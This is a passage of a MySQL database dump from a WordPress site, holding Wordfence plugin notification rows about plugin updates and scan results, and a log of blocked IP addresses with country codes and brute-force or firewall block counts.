href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-WQFQAAA',0,'wfplugin_updates',502,1636912705,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-24FQAAA',0,'wfplugin_updates',502,1637425056,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-6MFQAAA',0,'wfplugin_updates',502,1638385140,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('network-GQ2TGNZV',0,'toupp-20211122',100,1657815334,'<p><strong>Wordfence Terms of Service and End User License Agreement Update</strong></p>\n<p>Please review the updated Terms of Service with the new Wordfence End User License Agreement.\n</p>\n<p><a href=\"https://www.wordfence.com/terms-of-service/?utm_source=plugin&amp;utm_medium=pluginalert&amp;utm_campaign=toupp20211122\" class=\"wf-btn wf-btn-callout wf-btn-primary\" target=\"_blank\">Terms of Service</a> <a href=\"https://www.wordfence.com/license-terms-and-conditions/?utm_source=plugin&amp;utm_medium=pluginalert&amp;utm_campaign=toupp20211122\" class=\"wf-btn wf-btn-callout wf-btn-primary\" target=\"_blank\">End User License Agreement</a></p>','[]'),('site-EEGAAAA',0,'wfplugin_updates',502,1639418498,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-J4GAAAA',0,'wfplugin_updates',502,1640984931,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 4 plugins</a>','[]'),('site-KEGAAAA',0,'wfplugin_scan',502,1639669846,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">3 issues found in most recent scan</a>','[]'),('site-K4GAAAA',0,'wfplugin_scan',502,1639928786,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">3 issues found in most recent scan</a>','[]'),('site-LUGAAAA',0,'wfplugin_scan',502,1640447115,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">4 issues found in most recent scan</a>','[]'),('site-OAGAAAA',0,'wfplugin_scan',502,1640984931,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">4 issues found in most recent scan</a>','[]'),('site-PYGAAAA',0,'wfplugin_updates',502,1640985432,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-QAGAAAA',0,'wfplugin_scan',502,1641224561,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-Q4GAAAA',0,'wfplugin_scan',502,1642002085,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">6 issues found in most recent scan</a>','[]'),('site-R4GAAAA',0,'wfplugin_updates',502,1642271817,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-TIGAAAA',0,'wfplugin_scan',502,1642271817,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-VAGAAAA',0,'wfplugin_scan',502,1648783370,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">7 issues found in most recent scan</a>','[]'),('site-VUGAAAA',0,'wfplugin_updates',502,1642693457,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-YUGAAAA',0,'wfplugin_updates',502,1643778874,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 2 plugins</a>','[]'),('site-7UGAAAA',0,'wfplugin_updates',502,1643778895,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-AQGQAAA',0,'wfplugin_updates',502,1644505693,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-EIGQAAA',0,'wfplugin_updates',502,1645379846,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-IAGQAAA',0,'wfplugin_updates',502,1646630100,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 theme</a>','[]'),('site-PMGQAAA',0,'wfplugin_updates',502,1647303502,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-SIGQAAA',0,'wfplugin_updates',502,1649041815,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-Z4GQAAA',0,'wfplugin_scan',502,1649041737,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">1 issue found in most recent scan</a>','[]'),('site-3MGQAAA',1,'wfplugin_scan',502,1700583187,'<a href=\"https://eckankar-colorado.org/wp-admin/admin.php?page=WordfenceScan\">5 issues found in most recent scan</a>','[]'),('site-3QGQAAA',0,'wfplugin_updates',502,1649166685,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-4QGQAAA',0,'wfplugin_updates',502,1650323586,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-DQHAAAA',0,'wfplugin_updates',502,1651189520,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-J4HAAAA',0,'wfplugin_updates',502,1652020918,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-P4HAAAA',0,'wfplugin_updates',502,1653417251,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-YYHAAAA',0,'wfplugin_updates',502,1654014214,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-6EHAAAA',0,'wfplugin_updates',502,1654875553,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-C4HQAAA',0,'wfplugin_updates',502,1655742792,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-HYHQAAA',0,'wfplugin_updates',502,1656052426,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-JMHQAAA',0,'wfplugin_updates',502,1656952373,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-O4HQAAA',0,'wfplugin_updates',502,1658156674,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('network-GQ2TGNZW',1,'toupp-20220714',100,1700583186,'<p><strong>Wordfence Terms of Service and UK IDTA</strong></p>\n<p>Please review the updated Terms of Service with the new UK IDTA.\n</p>\n<p><a href=\"https://www.wordfence.com/terms-of-service/?utm_source=plugin&amp;utm_medium=pluginalert&amp;utm_campaign=toupp20220714\" class=\"wf-btn wf-btn-callout wf-btn-primary\" target=\"_blank\">Terms of Service</a> <a href=\"https://www.wordfence.com/uk-international-data-transfer-addendum/?utm_source=plugin&amp;utm_medium=pluginalert&amp;utm_campaign=toupp20220714\" class=\"wf-btn wf-btn-callout wf-btn-primary\" target=\"_blank\">UK IDTA</a></p>\n','[]'),('site-WAHQAAA',0,'wfplugin_updates',502,1658860307,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-2YHQAAA',0,'wfplugin_updates',502,1659030804,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-7EHQAAA',0,'wfplugin_updates',502,1660586746,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-DQIAAAA',0,'wfplugin_updates',502,1664472642,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-5IIAAAA',0,'wfplugin_updates',502,1665116875,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-BMIQAAA',0,'wfplugin_updates',502,1665523530,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-EQIQAAA',0,'wfplugin_updates',502,1666128283,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-J4IQAAA',0,'wfplugin_updates',502,1666888267,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 2 plugins</a>','[]'),('site-OUIQAAA',0,'wfplugin_updates',502,1672157732,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">Updates are available for 1 plugin and 1 theme</a>','[]'),('site-SAJAAAA',0,'wfplugin_updates',502,1680276949,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for WordPress (v6.2)</a>','[]'),('site-GYKAAAA',0,'wfplugin_updates',502,1681505327,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-NMKAAAA',0,'wfplugin_updates',502,1682096887,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-QQKAAAA',0,'wfplugin_updates',502,1682352615,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-RIKAAAA',0,'wfplugin_updates',502,1683664697,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-Z4KAAAA',0,'wfplugin_updates',502,1685030311,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-CEKQAAA',0,'wfplugin_updates',502,1685378289,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-EQKQAAA',0,'wfplugin_updates',502,1685674436,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-KEKQAAA',0,'wfplugin_updates',502,1687186658,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-OAKQAAA',0,'wfplugin_updates',502,1687540919,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-TEKQAAA',0,'wfplugin_updates',502,1688180430,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-WYKQAAA',0,'wfplugin_updates',502,1689356677,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-6MKQAAA',0,'wfplugin_updates',502,1689696668,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-7UKQAAA',0,'wfplugin_updates',502,1690559592,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-G4LAAAA',0,'wfplugin_updates',502,1691165465,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-JULAAAA',0,'wfplugin_updates',502,1692329561,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 theme</a>','[]'),('site-SILAAAA',0,'wfplugin_updates',502,1693073060,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-WILAAAA',0,'wfplugin_updates',502,1693416431,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-Y4LAAAA',0,'wfplugin_updates',502,1694279267,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-6ILAAAA',0,'wfplugin_updates',502,1694996611,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-CMLQAAA',0,'wfplugin_updates',502,1695314068,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-FELQAAA',0,'wfplugin_updates',502,1697079179,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-QULQAAA',0,'wfplugin_updates',502,1697730709,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-UELQAAA',0,'wfplugin_updates',502,1698188477,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-XULQAAA',0,'wfplugin_updates',502,1698261757,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-ZALQAAA',0,'wfplugin_updates',502,1699031384,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-5QLQAAA',0,'wfplugin_updates',502,1699114307,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-6MLQAAA',0,'wfplugin_updates',502,1699375580,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-AMMAAAA',0,'wfplugin_updates',502,1699466975,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 theme</a>','[]'),('site-CMMAAAA',0,'wfplugin_updates',502,1699995946,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 1 plugin</a>','[]'),('site-G4MAAAA',1,'wfplugin_updates',502,1700583186,'<a href=\"https://eckankar-colorado.org/wp-admin/update-core.php\">An update is available for 4 plugins</a>','[]');
/*!40000 ALTER TABLE `wpcl_wfnotifications` ENABLE KEYS */;
UNLOCK TABLES;

-- Dumped table `wpcl_wfnotifications` with 158 row(s)
--

--
-- Table structure for table `wpcl_wfblockediplog`
--

DROP TABLE IF EXISTS `wpcl_wfblockediplog`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wpcl_wfblockediplog` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `countryCode` varchar(2) NOT NULL,
  `blockCount` int(10) unsigned NOT NULL DEFAULT 0,
  `unixday` int(10) unsigned NOT NULL,
  `blockType` varchar(50) NOT NULL DEFAULT 'generic',
  PRIMARY KEY (`IP`,`unixday`,`blockType`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3 COLLATE=utf8mb3_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpcl_wfblockediplog`
--

LOCK TABLES `wpcl_wfblockediplog` WRITE;
/*!40000 ALTER TABLE `wpcl_wfblockediplog` DISABLE KEYS */;
INSERT INTO `wpcl_wfblockediplog` VALUES (0x00000000000000000000FFFF6FE6CA93,'CN',1,19657,'brute'),(0x00000000000000000000FFFF51A1E5DF,'NL',1,19657,'brute'),(0x00000000000000000000FFFF8D5EF7AA,'FR',1,19657,'brute'),(0x00000000000000000000FFFF29D8BCA2,'DE',1,19657,'waf'),(0x00000000000000000000FFFF43CD0C92,'US',1,19657,'brute'),(0x00000000000000000000FFFF68FAED51,'US',1,19657,'waf'),(0x00000000000000000000FFFFA123DA9D,'DE',1,19657,'brute'),(0x00000000000000000000FFFF45A3E068,'US',2,19657,'brute'),(0x00000000000000000000FFFFC0F1E72A,'US',1,19657,'waf'),(0x00000000000000000000FFFF23BB3A88,'BE',1,19657,'brute'),(0x00000000000000000000FFFF68F44F72,'LU',1,19657,'brute'),(0x00000000000000000000FFFF416D1493,'FI',1,19657,'waf'),(0x00000000000000000000FFFF8B3B1AD1,'IN',1,19657,'brute'),(0x00000000000000000000FFFFABF4005B,'VN',1,19657,'brute'),(0x00000000000000000000FFFF33DE9E0E,'CA',1,19657,'waf'),(0x00000000000000000000FFFF5E173DA5,'FR',2,19657,'brute'),(0x00000000000000000000FFFFCDB97AB8,'US',1,19655,'brute'),(0x00000000000000000000FFFF33DE9E0E,'CA',2,19655,'waf'),(0x00000000000000000000FFFF2D3DBA12,'US',1,19657,'brute'),(0x00000000000000000000FFFF335B973C,'FR',1,19657,'brute'),(0x00000000000000000000FFFFA5E359BD,'US',1,19657,'brute'),(0x00000000000000000000FFFF867A6C18,'GB',28,19664,'waf'),(0x00000000000000000000FFFFC2A9AF5D,'NL',8,19664,'waf'),(0x00000000000000000000FFFF29D8BCA2,'DE',3,19664,'waf'),(0x00000000000000000000FFFF23B02B9F,'GB',2,19664,'brute'),(0x00000000000000000000FFFF6BBD1D5C,'LU',1,19664,'brute'),(0x00000000000000000000FFFF9387FF08,'FR',1,19664,'brute'),(0x00000000000000000000FFFF29D8BC5C,'DE',4,19664,'waf'),(0x00000000000000000000FFFFC2A9AF1A,'NL',4,19664,'waf'),(0x00000000000000000000FFFFB9D0B417,'IR',1,19664,'brute'),(0x00000000000000000000FFFFC0F1D726,'US',1,19664,'waf'),(0x00000000000000000000FFFF2D93F810,'DE',14,19664,'brute'),(0x00000000000000000000FFFF97EC1677,'US',11,19664,'brute'),(0x00000000000000000000FFFF8F6EF47B,'IN',1,19664,'brute'),(0x00000000000000000000FFFF92BE47E8,'US',1,19664,'brute'),(0x00000000000000000000FFFF62463217,'IN',3,19664,'waf'),(0x00000000000000000000FFFF0D5FE80B,'NL',22,19664,'brute'),(0x00000000000000000000FFFFCDB97AB8,'US',1,19663,'brute'),(0x00000000000000000000FFFF8D5EF7AA,'FR',1,19663,'brute'),(0x00000000000000000000FFFFC2A9AF1A,'NL',2,19663,'waf'),(0x00000000000000000000FFFF5B5CFE59,'BG',1,19663,'waf'),(0x00000000000000000000FFFF5B5CFCA8,'BG',1,19663,'waf'),(0x00000000000000000000FFFFC2A9AF16,'NL',1,19663,'waf'),(0x00000000000000000000FFFF0D4F119E,'IE',1,19663,'brute'),(0x00000000000000000000FFFF68FAED51,'US',1,19655,'waf'),(0x00000000000000000000FFFFC2261647,'UA',1,19655,'waf'),(0x00000000000000000000FFFFC2A9AF1A,'NL',8,19655,'waf'),(0x00000000000000000000FFFF43CD0C92,'US',1,19655,'brute'),(0x00000000000000000000FFFF25BB872D,'FR',1,19655,'brute'),(0x00000000000000000000FFFF2D861A02,'RU',1,19653,'waf'),(0x00000000000000000000FFFF68F44A08,'LU',2,19653,'brute'),(0x00000000000000000000FFFF6BAAFD24,'US',1,19653,'waf'),(0x00000000000000000000FFFF14AB324B,'US',1,19652,'waf'),(0x00000000000000000000FFFF68F44844,'LU',1,19652,'brute'),(0x00000000000000000000FFFF33DE9E0E,'CA',1,19652,'waf'),(0x00000000000000000000FFFF6BBD03C0,'LU',1,19652,'brute'),(0x00000000000000000000FFFF14A802CF,'US',1,19652,'brute'),(0x00000000000000000000FFFF14262C62,'US',5,19652,'waf'),(0x00000000000000000000FFFF43CD0C92,'US',1,19651,'brute'),(0x00000000000000000000FFFF14262E3D,'US',1,19651,'brute'),(0x00000000000000000000FFFF23BB3A88,'BE',1,19651,'brute'),(0x00000000000000000000FFFF14A3198E,'US',1,19651,'brute'),(0x00000000000000000000FFFF67B4A3CD,'IN',1,19651,'waf'),(0x00000000000000000000FFFF14A80912,'US',1,19651,'brute'),(0x00000000000000000000FFFF14A8063C,'US',24,19652,'brute'),(0x00000000000000000000FFFF2F73329A,'CN',1,19652,'brute'),(0x00000000000000000000FFFF14A80912,'US',84,19652,'brute'),(0x00000000000000000000FFFF14A3198E,'US',83,19652,'brute'),(0x00000000000000000000FFFF966D94D8,'HK',1,19652,'brute'),(0x00000000000000000000FFFF14262E3D,'US',63,19652,'brute'),(0x00000000000000000000FFFFC2A9AF5C,'NL',12,19652,'waf'),(0x00000000000000000000FFFFC0F1E213,'US',1,19652,'waf'),(0x00000000000000000000FFFF29D8BC5C,'DE',1,19652,'waf'),(0x00000000000000000000FFFF45A3E068,'US',1,19652,'brute'),(0x00000000000000000000FFFF2D3DB977,'US',1,19652,'brute'),(0x00000000000000000000FFFF52B48A06,'US',1,19652,'brute'),(0x00000000000000000000FFFFC7C3FAE5,'US',1,19652,'brute'),(0x00000000000000000000FFFF92BE47E8,'US',1,19652,'brute'),(0x00000000000000000000FFFFD89219C9,'US',2,19652,'waf'),(0x00000000000000000000FFFF8B3B1AD1,'IN',1,19652,'brute'),(0x00000000000000000000FFFF023BFE15,'BG',1,19652,'waf'),(0x00000000000000000000FFFFB23F4D26,'DE',1,19652,'brute'),(0x00000000000000000000FFFF6BBD0B51,'LU',1,19652,'brute'),(0x00000000000000000000FFFFC2261647,'UA',1,19652,'waf'),(0x00000000000000000000FFFF955B7ADF,'ES',1,19652,'brute'),(0x00000000000000000000FFFF566BC6C0,'KZ',1,19652,'brute'),(0x00000000000000000000FFFF5BEEA4AC,'GB',1,19652,'brute'),(0x00000000000000000000FFFF9DE6BF87,'US',1,19657,'brute'),(0x00000000000000000000FFFF14A80890,'US',36,19657,'brute'),(0x00000000000000000000FFFFC2A9AF5C,'NL',4,19657,'waf'),(0x00000000000000000000FFFFBA5745D0,'CO',1,19657,'brute'),(0x00000000000000000000FFFF529D100B,'CN',2,19657,'brute'),(0x00000000000000000000FFFF68FAEE68,'US',1,19657,'waf'),(0x00000000000000000000FFFF9C360B8B,'IT',1,19657,'brute'),(0x00000000000000000000FFFFC2261647,'UA',1,19657,'waf'),(0x00000000000000000000FFFF14A61D1C,'IE',53,19656,'brute'),(0x00000000000000000000FFFF675AA34B,'US',42,19656,'brute'),(0x00000000000000000000FFFF8D5E682F,'FR',1,19656,'waf'),(0x00000000000000000000FFFF8987B4A2,'IE',1,19656,'waf'),(0x00000000000000000000FFFF14A30F0B,'US',3,19656,'brute'),(0x00000000000000000000FFFFC66231A3,'US',1,19656,'brute'),(0x00000000000000000000FFFF68FAEE68,'US',1,19656,'waf'),(0x00000000000000000000FFFF14A30B06,'US',1,19656,'brute'),(0x00000000000000000000FFFF2D0CFD15,'NL',32,19656,'waf'),(0x00000000000000000000FFFFC2A9AF5C,'NL',331,19656,'waf'),(0x00000000000000000000FFFF14A835D3,'US',1,19656,'waf'),(0x00000000000000000000FFFFACE99AEB,'US',1,19657,'brute'),(0x00000000000000000000FFFF9FDF2DD4,'SG',1,19657,'brute'),(0x00000000000000000000FFFFA516DC8C,'IN',2,19661,'waf'),(0x00000000000000000000FFFFC2A9AF1B,'NL',2,19660,'waf'),(0x00000000000000000000FFFF6BBD0B51,'LU',1,19660,'brute'),(0x00000000000000000000FFFF29D8BCA2,'DE',1,19660,'waf'),(0x00000000000000000000FFFFC2A9AF16,'NL',4,19660,'waf'),(0x00000000000000000000FFFF5F6FEAB8,'DE',2,19660,'waf'),(0x00000000000000000000FFFF68FAEE68,'US',1,19660,'waf'),(0x00000000000000000000FFFF34E80608,'NL',47,19660,'brute'),(0x00000000000000000000FFFFC2261647,'UA',1,19660,'waf'),(0x00000000000000000000FFFF14262E3D,'US',39,19660,'brute'),(0x00000000000000000000FFFF34E80608,'NL',2,19661,'brute'),(0x00000000000000000000FFFF6BBD1D5C,'LU',1,19661,'brute'),(0x00000000000000000000FFFFC2A9AF5D,'NL',4,19661,'waf'),(0x00000000000000000000FFFF68E18FE4,'CA',24,19661,'brute'),(0x00000000000000000000FFFF2E142EC6,'DE',6,19661,'waf'),(0x00000000000000000000FFFF2D3DBA12,'US',1,19663,'brute'),(0x00000000000000000000FFFF14F40440,'IN',1,19663,'waf'),(0x00000000000000000000FFFF9FCB51C5,'US',1,19662,'waf'),(0x00000000000000000000FFFF14A30F0B,'US',26,19662,'waf'),(0x00000000000000000000FFFFC66231AA,'US',1,19662,'brute'),(0x00000000000000000000FFFF9F59E0F7,'US',1,19678,'waf'),(0x00000000000000000000FFFF33DE9E0E,'CA',1,19678,'waf'),(0x00000000000000000000FFFF5B867E5B,'FR',1,19678,'waf'),(0x00000000000000000000FFFF04F0549B,'IN',1,19678,'waf'),(0x00000000000000000000FFFF55D7A2F3,'DE',1,19678,'waf'),(0x00000000000000000000FFFF29D8BC5C,'DE',12,19678,'waf'),(0x00000000000000000000FFFFC2A9AF5C,'NL',1,19678,'waf'),(0x00000000000000000000FFFFB9D84602,'US',4,19678,'waf'),(0x00000000000000000000FFFF624618CB,'IN',1,19677,'waf'),(0x00000000000000000000FFFF5B5CFCA2,'BG',7,19676,'waf'),(0x00000000000000000000FFFF2FF2B504,'HK',1,19664,'brute'),(0x00000000000000000000FFFF68F8E599,'US',3,19664,'waf'),(0x00000000000000000000FFFF53D8B945,'IT',1,19664,'waf'),(0x00000000000000000000FFFF9DE6BF87,'US',1,19664,'brute'),(0x00000000000000000000FFFFACE98EBD,'US',3,19664,'waf'),(0x00000000000000000000FFFF2B8B72B8,'CN',3,19662,'brute'),(0x00000000000000000000FFFFC2A9AF24,'NL',41,19664,'waf'),(0x00000000000000000000FFFFD18D2E63,'US',1,19664,'brute'),(0x00000000000000000000FFFF36259CF0,'FR',1,19664,'brute'),(0x00000000000000000000FFFF3E8D26D7,'DE',17,19664,'waf'),(0x00000000000000000000FFFF670F4A66,'IN',1,19664,'waf'),(0x00000000000000000000FFFFC2A9AF9E,'NL',13,19664,'waf'),(0x00000000000000000000FFFF4246AA98,'CA',1,19664,'brute'),(0x00000000000000000000FFFF9FDFDEA1,'NL',1,19664,'brute'),(0x00000000000000000000FFFF55728ADC,'DE',46,19664,'waf'),(0x00000000000000000000FFFFC2A9AF23,'NL',34,19664,'waf'),(0x00000000000000000000FFFF2E36A2FE,'SI',1,19664,'waf'),(0x00000000000000000000FFFF2D0CFD15,'NL',2,19655,'waf'),(0x00000000000000000000FFFFD46E5C9E,'MK',1,19655,'brute'),(0x00000000000000000000FFFF867A2496,'CA',1,19655,'waf'),(0x00000000000000000000FFFF28490476,'CN',1,19655,'brute'),(0x00000000000000000000FFFF5B86F8C0,'FR',1,19655,'waf'),(0x00000000000000000000FFFF78196878,'CN',1,19655,'brute'),(0x00000000000000000000FFFF2241EA00,'CH',1,19655,'brute'),(0x00000000000000000000FFFF6BBD0B51,'LU',1,19655,'brute'),(0x00000000000000000000FFFFB2801A2C,'SG',1,19655,'brute'),(0x00000000000000000000FFFF140E5E86,'US',1,19655,'brute'),(0x00000000000000000000FFFFC2A9AF18,'NL',1,19655,'waf'),(0x00000000000000000000FFFF34902DCB,'US',1,19662,'brute'),(0x00000000000000000000FFFF39802C67,'FR',15,19662,'waf'),(0x00000000000000000000FFFF34E80616,'NL',12,19662,'brute'),(0x00000000000000000000FFFF29D8BCA2,'DE',7,19661,'waf'),(0x00000000000000000000FFFF67B4A3CD,'IN',1,19661,'waf'),(0x00000000000000000000FFFF5B5CFF14,'BG',2,19661,'waf'),(0x00000000000000000000FFFF14F4241C,'IN',1,19661,'brute'),(0x00000000000000000000FFFF14F4015E,'IN',1,19661,'waf'),(0x00000000000000000000FFFF34E80616,'NL',15,19661,'brute'),(0x00000000000000000000FFFF0D4AE817,'IE',1,19661,'waf'),(0x00000000000000000000FFFF14262E94,'US',1,19661,'brute'),(0x00000000000000000000FFFFC0F1E139,'US',1,19661,'waf'),(0x00000000000000000000FFFFC2A9AF5C,'NL',12,19661,'waf'),(0x00000000000000000000FFFFCDB97AB8,'US',1,19661,'brute'),(0x00000000000000000000FFFF33DE9E0E,'CA',1,19661,'waf'),(0x00000000000000000000FFFF14A6411A,'IE',1,19661,'waf'),(0x00000000000000000000FFFF95CAF8D4,'FR',1,19661,'waf'),(0x00000000000000000000FFFF14262E3D,'US',1,19659,'brute'),(0x00000000000000000000FFFF327410E2,'US',1,19659,'brute'),(0x00000000000000000000FFFFA7583D5C,'US',1,19659,'waf'),(0x00000000000000000000FFFF2D3DB892,'US',1,19659,'brute'),(0x00000000000000000000FFFF36259CF0,'FR',1,19659,'brute'),(0x00000000000000000000FFFF679ECEA7,'BD',1,19659,'brute'),(0x00000000000000000000FFFF14F4241C,'IN',55,19662,'brute'),(0x00000000000000000000FFFFC2261647,'UA',1,19662,'waf'),(0x00000000000000000000FFFFD18D3863,'US',1,19662,'brute'),(0x00000000000000000000FFFFC2A9AF1A,'NL',4,19662,'waf'),(0x00000000000000000000FFFF2E142EC6,'DE',46,19662,'waf'),(0x00000000000000000000FFFF14A338EE,'US',15,19662,'waf'),(0x00000000000000000000FFFF29D8BCA2,'DE',4,19682,'waf'),(0x00000000000000000000FFFF36246C95,'FR',1,19682,'waf'),(0x00000000000000000000FFFF6BAAE615,'US',1,19682,'waf'),(0x00000000000000000000FFFFC2A9AF5D,'NL',2,19682,'waf'),(0x00000000000000000000FFFF04F0526D,'IN',1,19682,'waf'),(0x00000000000000000000FFFFC2A9AF1A,'NL',1,19682,'waf'),(0x00000000000000000000FFFF6B97B63A,'US',1,19682,'waf'),(0x00000000000000000000FFFFB33C9378,'VE',1,19681,'waf'),(0x00000000000000000000FFFFC2A9AF5C,'NL',12,19659,'waf'),(0x00000000000000000000FFFF1761CDD2,'NL',3,19659,'brute'),(0x00000000000000000000FFFF4D445789,'GB',1,19659,'brute'),(0x00000000000000000000FFFF45A3E068,'US',1,19659,'brute'),(0x00000000000000000000FFFF6BBD073A,'LU',1,19659,'brute'),(0x00000000000000000000FFFFC2A9AF5D,'NL',44,19659,'waf'),(0x00000000000000000000FFFFB52B6407,'CL',1,19658,'brute'),(0x00000000000000000000FFFF68F44C93,'LU',1,19658,'brute'),(0x00000000000000000000FFFF9C360B8B,'IT',1,19